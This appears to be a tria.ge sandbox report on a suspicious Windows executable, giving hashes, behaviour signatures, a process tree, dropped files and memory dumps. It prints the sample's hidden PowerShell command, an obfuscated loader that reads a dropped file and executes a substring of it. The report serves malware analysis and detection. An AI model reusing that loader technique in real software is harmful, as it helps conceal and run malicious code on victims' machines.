Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    19s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    03/02/2025, 15:07

General

  • Target

    rCRW51901537.exe

  • Size

    903KB

  • MD5

    5e61c03c8a975e86e792bfa3f671ba64

  • SHA1

    63ce77c1135445358dfae6f106e964546fdc025d

  • SHA256

    ea08fba535ff837c953efbd7e664aa22bec2f4784d2d66e3dea3b357b705d973

  • SHA512

    fe51514c8b8563b6e32a4369fab1d3f5af840768cdad3cd5887fbde5a9e47ac9edec446e2776fa3f998d71977fe8034e1da5069684389f6073ce78d910dedb20

  • SSDEEP

    24576:Xiln2+hjdsfdMks3KgZ32Z8ImwIQSEab+W0Ab:Xonzds1MkkKBZ8I1RSTb+m

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\rCRW51901537.exe
    "C:\Users\Admin\AppData\Local\Temp\rCRW51901537.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:908
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Ideographic=gc -raw 'C:\Users\Admin\AppData\Local\Discernibly\lagringsformers\kasusbjning\Degaardenes179\Bloter.Ino';$Reigned=$Ideographic.SubString(70797,3);.$Reigned($Ideographic) "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2824

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Discernibly\lagringsformers\kasusbjning\Degaardenes179\barricade.jpg

    Filesize

    17KB

    MD5

    ff66a9c96e345d70d38cc3a3abb6aaf6

    SHA1

    4983d3dc65bb245e9ba5b5777a75faccc2b76459

    SHA256

    03c46abaa1a37f0998ebb5da7ee3cad386037de6821958f1c7517ed10f7a846a

    SHA512

    36f25fcd0af78503a951f953bb65632735148902f5cf59aedfee2b74d649e57498f8ac047046448939aeed16539895746621fa91b489061be1219746921696f3

  • \Users\Admin\AppData\Local\Temp\nsj7CDE.tmp\nsExec.dll

    Filesize

    6KB

    MD5

    b55f7f1b17c39018910c23108f929082

    SHA1

    1601f1cc0d0d6bcf35799b7cd15550cd01556172

    SHA256

    c4c6fe032f3cd8b31528d7b99661f85ee22cb78746aee98ec568431d4f5043f7

    SHA512

    d652f2b09396ef7b9181996c4700b25840ceaa6c1c10080a55ce3db4c25d8d85f00a21e747f9d14a3374be4cdd4ea829a18d7de9b27b13b5e304447f3e9268fa

  • memory/2824-27-0x0000000074261000-0x0000000074262000-memory.dmp

    Filesize

    4KB

  • memory/2824-29-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB

  • memory/2824-28-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB

  • memory/2824-30-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB

  • memory/2824-31-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB

  • memory/2824-32-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB